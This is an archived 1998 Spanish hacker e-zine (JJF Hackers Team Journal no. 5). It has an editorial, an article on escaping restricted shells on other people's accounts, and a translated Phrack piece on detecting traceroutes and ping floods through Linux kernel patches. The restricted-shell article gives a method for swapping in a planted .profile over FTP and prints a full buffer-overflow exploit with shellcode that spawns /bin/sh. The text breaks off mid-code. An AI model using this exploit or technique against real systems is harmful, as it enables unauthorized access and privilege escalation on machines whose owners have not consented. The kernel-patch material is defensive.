home *** CD-ROM | disk | FTP | other *** search
/ Power Hacker 2003 / Power_Hacker_2003.iso / E-zine / Magazines / jjf / jjf005.txt < prev    next >
Encoding:
Text File  |  2002-05-27  |  128.6 KB  |  2,981 lines

  1.  
  2.                    
  3.                
  4.                         ╔────────────────────────────╗
  5.                         │                  ┌──────┐  │
  6.                         │                  │██████│  │
  7.                         │           ┌──────┤██┌───┘  │
  8.                         │    ┌──────┤██████│██└─┐    │
  9.                         │    │██████├─┐██┌─┤████│    │
  10.                         │    └─┐██┌─┴┐│██│J│██┌─┘    │
  11.                         │  ┌──┐│██│██└┘██│J│██│      │  
  12.                         │  │██└┘██│██████│F├──┘      │  
  13.                         │  │██████├──────┴─┘         │  
  14.                         │  └──────┘                  │  
  15.                         │   H A C K E R S  T E A M   │  
  16.                         │       J O U R N A L        │  
  17.                         ╠────────────────────────────╣        
  18.                         │     VOL. #1, Nº5, 1998.    │ 
  19.                         ╚────────────────────────────╝
  20.  
  21.  
  22.                  "LA PACIENCIA ES LA LLAVE DEL CONOCIMIENTO"
  23.  
  24.  
  25. -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=          
  26.  
  27.      Nota: - J.J.F. / HACKERS TEAM - no se hace responsable del mal uso
  28.            de la informacion aqui expuesta y tampoco tiene que estar
  29.            de acuerdo con lo que sus colaboradores opinen.
  30.            Tampoco esperamos que la gente use la informacion aqui expuesta
  31.            para hacer daño ya que tan solo es con fines didacticos.
  32.  
  33.      Recomendado el uso del editor del MS-DOS.
  34.  
  35. -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=          
  36.  
  37.      #CURRENT MEMBERS :
  38.  
  39.      - CONDE VAMPIRO     - CODER  H/P/V  EDITOR
  40.      - MAC CRACK BISHOP  - CODER  C/P    WEBMASTER
  41.      
  42.      #WEB OFICIAL :
  43.  
  44.      - http://www.angelfire.com/mi/JJFHackers
  45.      - http://jjfhackers.home.ml.org
  46.  
  47.      #E-MAIL OFICIAL :
  48.  
  49.      - jjf_team@usa.net      
  50.  
  51.      #LLAVE PGP OFICIAL :
  52.      
  53.      -----BEGIN PGP PUBLIC KEY BLOCK-----
  54.      Version: 2.6.3ia
  55.  
  56.      mQCNAzVzXWwAAAEEALKaPtG7arRh4X0wUz16KP9/A6h4yhS5vcQ1QRx9TM7XV8w6
  57.      BcIJjz8AIeldDCO5Jix8R7Sb/FO/Uco0f5Rnpd98ObsHANr9wRDwGqUCWpOGVZ6+
  58.      ZhXEyfuDkzVl9MUxEVD1TyH08OGgdgRIKhCuPXY4C7W6Z+M0qVv0AX/CgliNAAUR
  59.      tCNKSkYgSGFja2VycyBUZWFtIDxqamZfdGVhbUB1c2EubmV0PokAlQMFEDVzXW1b
  60.      9AF/woJYjQEBlVwEAKgIdS0VA7qRuXMM7R4DtDcoz7We+vmHr/Mu+SvgsDkWRbBP
  61.      IHhI5OJxPRfShAvLtUXlGoCA0DuUDxoq4x9j/yDJQvhBwzPw53uwNWLs6+iI31jk
  62.      NCyv9h37hSfRTsRLq8hiQ3jqNWQO/i+O+c5RVr5gkSHdZF0lCvWI5NoSFnk0
  63.      =Wu00
  64.      -----END PGP PUBLIC KEY BLOCK-----
  65.  
  66.      #DISTRIBUIDORES OFICIALES DEL E-ZINE :
  67.  
  68.      - http://wakanda.islatortuga.com
  69.      - http://underhack.islatortuga.com
  70.      - http://teleline.es/persona/dep_blue 
  71.      - http://members.xoom.com/baron_rojo/
  72.      - http://oioio.dyn.ml.org
  73.  
  74.      #MIEMBRO OFICIAL (web ring) DE :
  75.  
  76.      - Black Angels
  77.      - Spanish Underground Web Ring
  78.  
  79.      #COLABORADORES CON ESTE NUMERO :
  80.  
  81.      - CubikIce
  82.      - Nobody
  83.      - Estado Porcino (WKT)
  84.  
  85.      #SALUDOS :
  86.  
  87.      - Metalslug (Wakanda)
  88.      - Schoddy Guy (Underhack)
  89.      - Cheroky
  90.      - Silicon Dragon
  91.      - Paseante (SET) 
  92.      - Dr Slump (oioio)
  93.  
  94. <────────────────────────────────────────────────────────────────────────────>
  95. <────────────────────────────────────────────────────────────────────────────>
  96. <────────────────────────────────────────────────────────────────────────────>
  97.  
  98.   - INDICE.                                  
  99.  
  100.     TITULO                                        AUTOR
  101.   ────────────\_______________________________/────────────
  102.  
  103.   * EDITORIAL ................................ J.J.F. / HACKERS TEAM
  104.   * HACK RSH (RESTRICTED SHELL) .............. NOBODY.
  105.   * HERRAMIENTAS PARA USUARIOS DE LINUX
  106.     (PARANOICOS?) ............................ CUBIKICE.
  107.   * CURSO DE HACK V .......................... CONDE VAMPIRO.
  108.   * COMO CRACKEAR NORTON CRASHGUARD
  109.     DELUXE 3.0 ............................... ESTADO PORCINO.
  110.   * UN POCO DE CULTURA: LIBROS ............... MAC CRACK
  111.   * EL LECTOR OPINA .......................... VARIOS.
  112.   * NOTICIAS UNDERGROUND ..................... J.J.F. / HACKERS TEAM
  113.  
  114. <────────────────────────────────────────────────────────────────────────────>
  115. ██████████████████████████████████████████████████████████████████████████████
  116. <────────────────────────────────────────────────────────────────────────────>
  117.  
  118.   -------------
  119.   │ EDITORIAL │
  120.   -------------
  121.  
  122.         Como siempre volvemos a la carga con un nuevo numero de vuestro ezine
  123.   favorito que siempre trae suculentos articulos. Pero por lo visto en los
  124.   mail's de nuestros lectores, se puede apreciar que muchos nos deciis que
  125.   nos pasamos con las materias aqui tratadas, otros que quereis informacion
  126.   underground con el unico fin de colaros en computadoras ajenas, esto
  127.   señores mios!, es totalmente irracional. La filosofia de este ezine no se
  128.   asemeja a esto ni por casualidad. Nosotros desde aqui lo unico que
  129.   pretendemos es informar a la gente pero nunca con fines delictivos ni nada
  130.   parecido, incluso estariamos encantados que los Administradores, expertos
  131.   en seguridad, las autoridades, nos escriban articulos o sus opiniones, ya
  132.   que este ezine esta pensado para todo el mundo.
  133.  
  134.         AVISAMOS, que la llave PGP que durante algunas semanas ha estado en
  135.   la web disponible, ya NO es nuestra llave oficial, por eso os avisamos
  136.   que nuestra llave oficial es esta que trae el ezine :) y tb la que esta
  137.   ahora en el web.
  138.  
  139.         Por fin, como muchos lectores nos habian solicitado hemos puesto
  140.   tanto en el web como en el ezine, nuestra llave publica, con el fin de
  141.   aquellos que nos quieran decir algo mas confidencialmente lo puedan hacer
  142.   sin ningun problema, como siempre mejoramos los servicios ;-) Ademas en
  143.   este numero a los distribuidores oficiales se nos unen los de Oioio, ya
  144.   conocidos en nuestro ezine :), pero este web solo esta disponible en
  145.   ciertas ocasiones, que conste!!
  146.  
  147.         Con este numero termina nuestro primer volumen, el cual pensamos,
  148.   que esta muy bien para la poca ayuda que recibimos por el momento, con
  149.   permiso de un conocido politico que en un meeting dijo 'Menos aplausos y
  150.   mas votos', yo digo 'Menos felicitaciones y mas articulos', esto solo
  151.   intenta ser una reflexion entre los lectores, ya que este ezine lo hacemos
  152.   todos no solo nosotros, siempre hay trabajo para todos.
  153.  
  154.         Deciros que ultimamente el USA.NET, el servidor donde nos enviais el
  155.   correo no ha funcionado muy bien que digamos, por eso seguramente vuestros
  156.   mail's no han llegado, por lo que simplemente nos vuelves a escribir y
  157.   listos. Tambien deciros que procuramos que el web este siempre actualizado
  158.   pero teneis que comprender que siempre se nos queda algun link antiquado,
  159.   ya que el web es muy dinamico y hacemos lo que podemos, okis ?
  160.  
  161.         Bueno, chicos, ahora que ya estamos casi en verano, es hora de
  162.   quitar el polvo a los ordenadores y hacer algo util en nuestras vidas, como
  163.   por ejemplo investigar aquella cosa que te tiene tan intrigado y despues
  164.   escribir un articulo sobre ello. Ahora ya no teneis excusa para trabajar
  165.   un poco ;-)
  166.  
  167.         Que empieze lo bueno de una vez, pero no antes sin decirte que
  168.   esperamos vuestros mail's con vuestras criticas, sugerencias, comentarios o
  169.   cualquier cosa que nos quieras decir, y por supuesto vuestros actos de hack
  170.   y tambien los programas que hayas creado para distribuirlos ;-), pues dicho
  171.   todo lo que tenia que decir, escribe a:
  172.  
  173.   jjf_team@usa.net
  174.  
  175.         NOTA DEL WEBMASTER: Como ya habeis leido un poco mas arriba de esta
  176.   editorial, los web los intento actualizar lo mas que puedo, ya se que hay
  177.   de vez en cuando algunos links que no funcionan y que antes lo hacian,
  178.   estoy en ello. Muchas veces esto pasa porque los servers a los que les he
  179.   puesto el link se han caido, o estan de remodelacion. Una cosa que si
  180.   quiero dejar clara, es que las web se actualizan periodicamente y los links
  181.   se comprueban casi diariamente con el fin de que sigan funcionando perfec-
  182.   tamente y a gusto de todos. Otra cosa, en vez de mandarme un mail diciendo
  183.   que no funcionan los links (algunos) mejor, decirme cuales NO funcionan e
  184.   intentare arreglarlos lo antes posible. Gracias. ;-)
  185.  
  186.  
  187.  
  188.                                                    - J.J.F. / HACKERS TEAM -
  189.   
  190. <────────────────────────────────────────────────────────────────────────────>
  191. ██████████████████████████████████████████████████████████████████████████████
  192. <────────────────────────────────────────────────────────────────────────────>
  193.                                                                    15-05-1998.
  194.                                                                     ????????
  195.  
  196.                       ()()()()()()()()()()()()()()()()()
  197.                       ()  HACK RSH (RESTRICTED SHELL) ()
  198.                       ()------------------------------()
  199.                       ()          by Nobody           ()
  200.                       ()()()()()()()()()()()()()()()()()
  201.  
  202.         Muchas veces cuando entramos en un shell ajeno, o sea en una cuenta
  203.   de un servidor, nos encontramos con el famoso RSH 'restricted shell', que
  204.   es un shell restringido, el cual es establecido por el administrador del
  205.   sistema, para anular la ejecucion de comandos que pueden comprometer la
  206.   seguridad del sistema, o incluso anulan el comando 'cd' para que no
  207.   podemos salir de nuestro directorio de trabajo.
  208.  
  209.         Basicamente, lo que haremos aqui es explicar diferentes tecnicas,
  210.   para poder saltarnos el rsh :), que conste que puede que estos metodos no
  211.   funcionen, por lo que nos tendremos que espabilar y buscar nuevos metodos,
  212.   solo teneis que poner a trabajar esa 'materia gris' que teneis por cabeza.
  213.  
  214.         Ahora lo mejor sera describir las restricciones que aplica el RSH,
  215.   y como funciona. Estas restricciones son :
  216.  
  217.   - Los usuarios no pueden moverse de su directorio propio, ya que la orden
  218.     'cd' esta descapacitada.
  219.  
  220.   - Los usuarios no puden cambiar el valor de la variable PATH, de modo que
  221.     solo pueden ejecutar ordenes en el PATH que les proporciona el 
  222.     administrador del sistema.
  223.  
  224.   - Los usuarios no pueden cambiar el valor de la variable SHELL.
  225.  
  226.   - Los usuarios no pueden ejecutar ordenes en directorios a los que 
  227.     aparezcan en su PATH, ya que no pueden utilizar un nombre de orden que
  228.     contegan una barra diagonal '/'.
  229.  
  230.   - Los usuarios no pueden redirigir la salida usando '>' o '>>'.    
  231.  
  232.   - Los usuarios no pueden utilizar ordenes exec.
  233.  
  234.         Como podemos ver el RSH, nos deja bastante limitados en el manejo del
  235.   sistema. Estas restricciones se aplican cuando se ha ejecutado el .profile
  236.   del usuario. El administrador debe preparar el fichero .profile, cambiando
  237.   el propietario del fichero a root y ademas debe cambiar los permisos en el
  238.   fichero para que nadie escriba en el mismo. El administrador define el
  239.   PATH del usuario en el .profile de modo que el usuario solo pueda ejecutar
  240.   comandos en su directorio especifico, generalmente se suele denominar
  241.   /usr/rbin.
  242.  
  243.     En realidad el RSH suele ser el shell SH pero invocado mediante el
  244.   parametro '-r'. La seguridad del RSH esta muy limitada ya que un hacker 
  245.   puede quebrarlo y obtener un shell sin rectricciones, pero se suele usar
  246.   bastante ya que nos librara de muchos que juegan a hackers ;-)
  247.  
  248.         Bueno, ya basta de teoria y empezemos con el juego. Como sabemos en
  249.   cada directorio de los usuarios hay unos determinados ficheros, que sirven
  250.   para configuraciones y a que podemos acceder, etc. Por ejemplo para ver
  251.   estos ficheros que son ocultos ejecutamos en el prompt :
  252.  
  253.   $ ls -al
  254.   total 14
  255.   drwxr-xr-x   2 500     nobo      1024 May   7 20:18 .
  256.   drwxr-xr-x   6 root    root      1024 May   7 16:05 ..
  257.   -rw-r--r--   1 500     nobo      3768 Nov   7  1997 .Xdefaults
  258.   -rw-r--r-T   1 root    root       143 May   7 14:52 .bash_history
  259.   -rw-r--r--   1 500     nobo        24 Jul  14  1994 .bash_logout
  260.   -rw-r--r--   1 500     nobo       220 Aug  23  1995 .bash_profile
  261.   -rw-r--r--   1 500     nobo       124 Aug  23  1995 .bashrc
  262.   -rw-rw-r--   1 500     nobo      3336 Oct  24  1997 .screenrc
  263.   $
  264.  
  265.     Bueno, aqui tenemos un ejemplo de los ficheros ocultos que suelen
  266.   tener los usuarios en sus directorios, los ficheros que nos interesan 
  267.   para este caso seran el .profile, aqui como .bash_profile y el .login
  268.   que aqui no esta presente, que suele estar en algunos sistemas.
  269.  
  270.         Que podamos saltarnos el RSH se debe al descuido de los
  271.   administradores, ya que esta considerado peligroso dejar el .profile en el
  272.   directorio del usuario, debido a que muchas veces podemos sustituir el
  273.   .profile por uno que creemos y subirlo usando el FTP a la cuenta. Lo que
  274.   tenemos que hacer es crear un .profile en nuestra maquina, despues lo
  275.   subimos por FTP a la cuenta que nos interesa y por ultimo via Telnet
  276.   conectamos a la cuenta y ya estaremos usando el .profile que hayamos
  277.   insertado :). Esto se debe a que aunque el .profile sea de propiedad root
  278.   se encuentra en el directorio del usuario, por esta razon el usuario o en
  279.   nuestro caso, nosotros, podemos escribir en el .profile. Para ver que shell
  280.   tenemos, basta que mirremos el etc/passwd que es un fichero de lectura
  281.   publica, aunque este en shadow podemos ver la ubicacion de los directorios
  282.   de los usuarios y los shell's asignados, esto lo haremos de la siguiente
  283.   manera:
  284.  
  285.   $ vi /etc/passwd
  286.  
  287.     Facil!! ;-) Pues ya a estas alturas ya debemos haver anulado el RSH,
  288.   pero para aquellos que tengan un administrador mas avispado, que utilizen
  289.   el siguiente programa, el cual desborda la memoria.
  290.  
  291. ------------ Codigo Fuente ---------------------------------------------------
  292.  
  293. /* 
  294.   SLACKWARE RSH Buffer OverFlow -- (c) shit-head (w0nky@usa.net) 1997
  295.   Created: 8/15/97
  296.  
  297.   Give thanks to Solar Designer for his su overflow, this is based
  298.   on that peice of work.
  299.  
  300.   This is for educational purposes only, in no way am I responsible 
  301.   for what you do with this.  This should be used by sys admins, or
  302.   people who have permission of the admin to run it to see if this
  303.   hole can exist on their system.  If you use it for the wrong reasons
  304.   then I say *tisk* on you.  I will not be held responsible for your 
  305.   actions.
  306.   
  307.   This could be done with a generic overflow program, but just
  308.   running this is easier.
  309.  
  310.   USAGE OF THIS DOES NOT GIVE YOU TECH SUPPORT SO DON'T
  311.   MESSAGE ANYBODY ON IRC ABOUT THIS.
  312.  
  313. */
  314.  
  315. #include <stdio.h>
  316. #include <stdlib.h>
  317. #include <unistd.h>
  318. char *shellcode =
  319.   "\x31\xc0\xb0\x31\xcd\x80\x93\x31\xc0\xb0\x17\xcd\x80\x68\x59\x58\xff\xe1"
  320.   "\xff\xd4\x31\xc0\x99\x89\xcf\xb0\x2e\x40\xae\x75\xfd\x89\x39\x89\x51\x04"
  321.   "\x89\xfb\x40\xae\x75\xfd\x88\x57\xff\xb0\x0b\xcd\x80\x31\xc0\x40\x31\xdb"
  322.   "\xcd\x80/"
  323.   "/bin/sh"
  324.   "0";
  325. char *get_sp() {
  326.    asm("movl %esp,%eax");
  327. }
  328. #define bufsize 2048
  329. char buffer[bufsize];
  330. main() {
  331.   int i;
  332.   for (i = 0; i < bufsize - 4; i += 4)
  333.     *(char **)&buffer[i] = get_sp() - 3072;
  334.   memset(buffer, 0x90, 512);
  335.   memcpy(&buffer[512], shellcode, strlen(shellcode));
  336.   buffer[bufsize - 1] = 0;
  337.   setenv("NLSPATH", buffer, 1);
  338.   system("clear");
  339.   printf("______________________________________________________________\n");
  340.   printf("| RSH Overflow -- (c) shit-head 1997\n");
  341.   printf("| Give props to Solar Designer for his su overflow, this is based
  342.             on that.\n");
  343.   printf("|\n");
  344.   printf("| Peep's to: suid, knowy, thugzsta, you all be reet.\n");
  345.   printf("|\n");
  346.   printf("| *NOTE* I'm not responsible if you abuse this. Run only w/
  347.             premission\n");
  348.   printf("| Sending Overflow.... Done.\n");
  349.   printf("--------------------------------------------------------------\n");
  350.   execl("/usr/bin/rsh", "/usr/bin/rsh", NULL);
  351. }
  352.  
  353. ------------ FIN -------------------------------------------------------------
  354.  
  355.         Bueno, gente esto es todo por hoy y espero que os haya gustado el
  356.   tema. Logicamente el RSH tiene mas truco pero no tiene gracia si os lo
  357.   digo todo ;-)
  358.  
  359.   Y desde aqui saludar a toda la peña de #seguridad_informatica!!!!!
  360.  
  361.   Grupos como - J.J.F. / HACKERS TEAM - , CYBERHACK, WAKANDA, UNDERHACK,
  362.   @pOkalypSYS, Oioio y todos los demas !!
  363.  
  364.   Y por supuesto : Bisho, Folixia, Fragel, Ipgh0st, Metalslug, Dillet,
  365.   Riddle, Hadden, Guybrush, Tdp, Virux, Cy, Angelipas, Schoddy Guy, Xus,
  366.   Enif, Bit-Quake, L.A., Nadia, Amanda, Case_zero, DrSlump, Prova, Marsuff,
  367.   Meroka, Eli, Minister, ElCoronel, Daek, Cosmic, Net Bull, Profesor Falken,
  368.   Icehouse y todos los que me dejo :)
  369.  
  370.                                                             NOBODY (c) 1998.
  371.  
  372. <────────────────────────────────────────────────────────────────────────────>
  373. ██████████████████████████████████████████████████████████████████████████████
  374. <────────────────────────────────────────────────────────────────────────────>
  375.  
  376.   No creo que haya que decir que todo esto es por mero interes educativo! 
  377.   o si? :) 
  378.  
  379.   /////////////////////////////////////\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\ 
  380.          [ Phrack Magazine Volume 7, Issue 5, Article 03 of 17] 
  381.  
  382.  
  383.             Herramientas para usuarios de Linux (paranoicos?) 
  384.             ------------------------------------------------- 
  385.  
  386.   por whynot AKA baldor 
  387.  
  388.   !!Se necesitan conocimientos basicos de TCP/IP para entender este articulo¡¡  
  389.  
  390.         Recientemente no solo el numero de ataques a servidores grandes o
  391.   comerciales y maquinas con conexiones rapidas ha crecido, tambien muchos
  392.   usuarios con conexion via telefonica han sido atacados o espiados. Un buen
  393.   ejemplo es el programa winnuke.c que fue enviado a BugTraq y ha sido usado
  394.   con exceso.
  395.  
  396.         Aqui, de lo que se trata no es de que sean lanzados hacia grandes
  397.   servidores, sino de que pueden llegar a ser agobiantes si algun idiota
  398.   intenta hackearte, para ralentizar tu conexion o tirar tu maquina. 
  399.  
  400.         Muchas distribuciones de Linux han reaccionado ante tal desarrollo y
  401.   han hecho que sus daemons de telnet/ftp/otros logueen cualquier acceso. Por
  402.   la misma razon puedes poner furiosas medidas de seguridad en tu
  403.   /etc/hosts..deny. Pero en mi opinion hay un par de cosas que se olvidan de
  404.   las que yo quisiera hablar aqui. 
  405.  
  406.   1. Detectando traceroutes. 
  407.  
  408.         Traceroute es un comando realmente poderoso que es normalmente usado
  409.   para detectar donde y a que red esta conectado el ordenador que esta siendo 
  410.   trazado. Por una serie de razones simplemente *no* puedes evitar que otra 
  411.   persona te tracee, por eso lo mejor que puedes hacer es detectar *si*
  412.   alguien te esta traceando o encontrar *quien* te esta traceando y
  413.   confundirle un poco. 
  414.  
  415.   1.1 Como trabaja traceroute? 
  416.  
  417.         Basicamente traceroute envia unos paquetes IP/UDP de prueba al host 
  418.   especificado. Para saber como es rutado el paquete (por que hosts esta  
  419.   pasando) traceroute usa el campo TTL (Time To Live) de la cabecera IP. 
  420.   El campo TTL especifica el limite superior de routers por los cuales pasa el 
  421.   paquete hasta que se pierde. Cada router decrementa el valor de este campo 
  422.   cuando llega el paquete en cuestion, hasta que llega a 0. Si esto ocurre 
  423.   el router envia el mensaje ICMP TIME_EXCEED al host que envía el paquete. 
  424.  
  425.         Por eso la estrategia que traceroute usa para trazar la ruta de un
  426.   paquete es enviar paquetes al host objetivo poniendole un valor que se
  427.   incrementa (empezando con 1) en el campo TTL. Si un host envia el mensaje
  428.   ICMP TIME_EXCEED traceroute muestra su direccion y el tiempo que ha pasado
  429.   desde el envio del paquete de prueba IP/UDP hasta la recepción del ICMP 
  430.   TIME_EXCEED. Tras eso prepara un nuevo paquete de prueba con un TTL una 
  431.   unidad mayor que el paquete anterior. 
  432.  
  433.         Traceroute sigue haciendo esto hasta que recibe un paquete ICMP 
  434.   PORT_UNREACHABLE desde el ordenador objetivo, o hasta que llega al numero 
  435.   maximo de hops (saltos) que le hayamos indicado (por defecto 30). 
  436.  
  437.         Para comprender todo esto deberiamos echarle un vistazo a la parte
  438.   UDP del paquete que hemos hablado arriba. Para detectar que algo ha llegado
  439.   al host objetivo y no enviar mas paquetes traceroute usa el protocolo UDP. 
  440.   La parte UDP del paquete de prueba esta dirigida a un puerto que nunca, o
  441.   muy raramente se usa (en los Unix mas modernos es 33434 mas el TTL incluido
  442.   en el paquete IP). Como (normalmente) nada esta escuchando en el puerto
  443.   33434 (o uno superior) el host objetivo envia una señal de ICMP
  444.   PORT_UNREACHABLE que le indica a traceroute que ha encontrado al host
  445.   objetivo y debe parar de enviar paquetes. 
  446.  
  447.         Teniendo en cuenta que la mecanica de traceroute es un poco compleja
  448.   aqui tenemos un ejemplo un poco simplificado. Digamos que tu eres el host
  449.   'source' y estas trazando tu ruta hacia el host 'target'
  450.  
  451.   source:/root # traceroute target
  452.   traceroute to target (134.2.110.94), 30 hops max, 40 byte packets 
  453.  
  454.         Ahora 'source' envía un paquete de prueba al host 'target' (puerto
  455.   33434) con un TTL de 1. El paquete pasa entonces por 'host_entremedio' y el
  456.   router decrementa el TTL del paquete, descubre que el paquete ha "expirado"
  457.   (TTL=0) y envia de vuelta un ICMP TIME_EXCEED a 'source'. Ahora traceroute
  458.   usa la informacion incluida en este paquete para mostrar los datos del
  459.   primer host por donde estan pasando los paquetes: 
  460.  
  461.   1 host_entremedio (142.45.23.1) 2.456 ms 
  462.  
  463.         'source' envia otro paquete de prueba, esta vez el TTL es 2 y el
  464.   puerto es 33434+1 = 33435. Recibe otro paquete de vuelta ICMP TIME_EXCEED
  465.   desde 'otro_host': 
  466.  
  467.   2 otro_host (142.45.10.1) 3.983 ms 
  468.  
  469.         La tercera prueba tiene el TTL puesto a 3 y es dirigida al puerto
  470.   33436. Es ahora cuendo Traceroute recibe un ICMP PORT_UNREACHABLE desde
  471.   'target':
  472.  
  473.   3 target (142.45.10.13) 4.032 ms 
  474.  
  475.         Ahi esta ! Traceroute ha terminado su trabajo y se finaliza. 
  476.  
  477.   source:/root # 
  478.  
  479.         Hay que decir que, por defecto, traceroute envia tres paquetes
  480.   conteniendo el mismo TTL (cada paquete a un numero de puerto incrementado)
  481.   para determinar el tiempo de respuesta de un host con mas exactitud. En
  482.   realidad, traceroute nos muestra algo como esto: 
  483.  
  484.   traceroute to localhost (127.0.0.1), 30 hops max, 40 byte packets 
  485.   1 localhost (127.0.0.1) 1.983 ms 1.304 ms 0.934 ms 
  486.  
  487.   1.2 El funcionamiento del detector de traceroute. 
  488.  
  489.         Sabiendo como trabaja traceroute es muy facil detectarlo. Simplemente 
  490.   pon tus sockets a escuchar en el puerto 33434 y superiores y reacciona 
  491.   si recibes algun paquete. Puedes intentar adivinar con cuantos hops te 
  492.   estan traceando restando 33434 al puerto donde has recibido el paquete y 
  493.   dividiendo el resultado por 3. 
  494.  
  495.         Escuchar en el puerto por el que traceroute envia el paquete de prueba
  496.   tiene un bonito efecto: no enviar de vuelta un paquete ICMP TIME_EXCEED ni
  497.   una señal de ICMP PORT_UNREACHABLE. Obtendr un timeout por respuesta y
  498.   pondra un * en la lista de hosts porque con un timeout traceroute *no*
  499.   reconocer que ha pasado por su objetivo y continuar enviando paquetes de
  500.   prueba hasta que el numero maximo de hops sea alcanzado. 
  501.  
  502.         Con el pequeño programa detecttr corriendo (y escuchando en los
  503.   puertos 33434 - 33434*30*3) un traceroute a nuestro host apareceria asi: 
  504.  
  505.   schnecke:/root # traceroute localhost 
  506.   traceroute to localhost (127.0.0.1), 30 hops max, 40 byte packets 
  507.   1 * * * 
  508.   2 * * * 
  509.   . 
  510.   . 
  511.   . 
  512.   30 * * * 
  513.  
  514.   1.3 Problemas detectando traceroutes. 
  515.  
  516.         El unico problema con la deteccion de traceroutes es que alguien
  517.   puede especificar un numero de puerto distinto del que hay por defecto o
  518.   usar otra tecnica. Nunca he visto a nadie hacer esto, asi que si el idiota
  519.   de turno (o un wannabe cualquiera) te esta trazando tus posibilidades de 
  520.   detectarlo son bastante altas. 
  521.  
  522.         Si eres *realmente* paranoico con los traceroutes no deberias usar
  523.   los puertos para detectar un traceo pero puedes editar el fichero que
  524.   maneja los paquetes UDP. El fichero es: /usr/src/linux/net/ipv4/udp.c 
  525.  
  526.         (NOTA: Este fichero es parte del kernel. Recompila el kernel para que
  527.   los cambios tengan efecto) 
  528.  
  529.         Inserta la linea: 
  530.  
  531.   printk(KERN_INFO "UDP: packet sent to unreachable port by %s !\n",
  532.   in_ntoa(daddr)); 
  533.  
  534.         Tras la linea 833: 
  535.  
  536.   ICMP_send(ski,ICMP_BEST_UNTEACH, ICMP_PORT_UNTEACH, 0, de); 
  537.  
  538.         Esto hara  que el sistema loguee *todas* las entradas a puertos que 
  539.   no esten escuchando algo con el protocolo UDP. Hay que decir que el bonito 
  540.   efecto descrito en el capitulo 1.2 no ocurriria (lo cual tambien podria ser 
  541.   una ventaja). 
  542.  
  543.         BTW: Por favor, ten cuidado cuando edites el kernel - realmente lo
  544.   necesitas :) 
  545.  
  546.   1.4 Un ejemplo de implementacion. 
  547.  
  548.   detecttr.c -> Mira al final de este fichero 
  549.  
  550.   2.Detectando pings. 
  551.  
  552.         Hubo un monton de discusion en los ultimos meses sobre ping porque ha
  553.   sido usado con bastante frecuencia para transmitir gruesos paquetes a otros
  554.   hosts que acabaron en crashes. A pesar de que este bug ha sido corregido en
  555.   muchos hosts, el comando ping sigue siendo muy popular para ralentizar el
  556.   modem de quienes estan en la Red, la conexion se les viene abajo debido a
  557.   un GRAN lag.
  558.  
  559.         *No* puedes evitar que alguien te haga un ping (a no ser que tu ISP 
  560.   bloquee todos los paquetes ICMP_ECHO hacia tu ordenador) y tampoco que ping 
  561.   este aumentando el trafico en tu modem. Pero puedes detectar *quien* te ha 
  562.   hecho un ping, determinar el tamaño del paquete ping y decidirte a no 
  563.   contestarle (esto *puede* reducir en 2 veces el ancho de banda de tu modem). 
  564.  
  565.   2.1 Como trabaja ping y como la gente ralentiza otras conexiones usando
  566.       ping?
  567.  
  568.         Resumiendo, ping envia un paquete conteniendo un ICMP_ECHO y algunos
  569.   datos mas al host objetivo el cual contestar con un paquete ICMP_ECHOREPLY
  570.   que contiene, ademas, los datos enviados (solo se modifican unos pocos
  571.   campos).
  572.  
  573.         Normalmente ping esperar un 1 segundo despues de enviar el siguiente 
  574.   ICMP_ECHO. En muchas implementaciones de ping se puede pasar por alto este 
  575.   segundo y hacer un 'floodping' que *no* esperar y enviar los paquetes tan 
  576.   rapido como sea posible. Si eliges un tamaño grande de paquete y tu
  577.   conexion es rapida (T1 o Ethernet) esto causar un monton de trafico en el
  578.   modem de tu victima y acabara ralentiza ndolo hasta desconectarlo. 
  579.  
  580.   2.2 Como puedo detectar un ping y como puedo evitar que me flodeen? 
  581.  
  582.         Como un ping no es mas que un ICMP_ECHO con algunos datos añadidos 
  583.   simplemente puedes interceptarlo, extraer la direccion del que te lo envia 
  584.   y el tamaño del paquete y decidir si quieres responderle o no. Si el ping
  585.   no es un flood-ping puedes reducir la cantidad de datos que transfieres
  586.   desde tu modem simplemente no respondiendole. Pero si alguien te esta
  587.   haciendo un floodping no te ayudar mucho el no responderle --> los paquetes
  588.   ping probablemente estan causandote demasiado trafico y ralentizando tu
  589.   conexion (mientras el host desde donde vienen los floodpings tenga una
  590.   conexion lenta). Por lo menos siempre puedes darle una oportunidad... 
  591.  
  592.   2.3 Ejemplo de implementacion 
  593.  
  594.         El manejo del ICMP_ECHO le corresponde al kernel. Edita el fichero 
  595.   /usr/src/linux/net/ipv4/icmp.c y busca la seccion 'Handle ICMP_ECHO'. 
  596.   Estas 16 lineas de codigo son todo lo que necesitas modificar para
  597.   defenderte contra/detectar los ping-floods. 
  598.  
  599.         Si sabes un poco de C podras ver que hay un define 
  600.   "CONFIG_IP_IGNORE_ECHO_REQUESTS" que puedes usar para que el el kernel
  601.   ignore todos ICMP ECHO_REQUESTs entrantes. Pero queremos ser mas selectivos. 
  602.   Queremos hacer un log de todos los pings que envien a nuestra maquina.. Esto 
  603.   lo haremos insertando la linea: 
  604.  
  605.   printk(KERN_INFO "ICMP: pinged by %s, packetsize = %d \n",in_ntoa(saddr), 
  606.   icmp_param.data_len); 
  607.  
  608.         tras el #endif. 
  609.  
  610.         Es facil cambiar la seccion "Handle ICMP_ECHO" asi tu ordenador 
  611.   solo responder a los ICMP ECHO_REQUESTs que no sean muy voluminosos e
  612.   ignorar los pings con paquetes de gran tamaño.
  613.  
  614.   icmp.patch 
  615.   static void icmp_echo(struct icmphdr *icmph, struct sk_buff *skb, struct
  616.   device
  617.   *dev, __u32 saddr, __u32 daddr, int len) 
  618.   { 
  619.   #ifndef CONFIG_IP_IGNORE_ECHO_REQUESTS 
  620.   struct icmp_bxm icmp_param; 
  621.   if (len <= 1000) { /* solo contestamos a los ping que lleven menos de 1k de 
  622.                         datos */ 
  623.   icmp_param.icmph=*icmph; 
  624.   icmp_param.icmph.type=ICMP_ECHOREPLY; 
  625.   icmp_param.data_ptr=(icmph+1); 
  626.   icmp_param.data_len=len; 
  627.   if (ip_options_echo(&icmp_param.replyopts, NULL, daddr, saddr, skb)==0) 
  628.   icmp_build_xmit(&icmp_param, daddr, saddr, skb->ip_hdr->tos); 
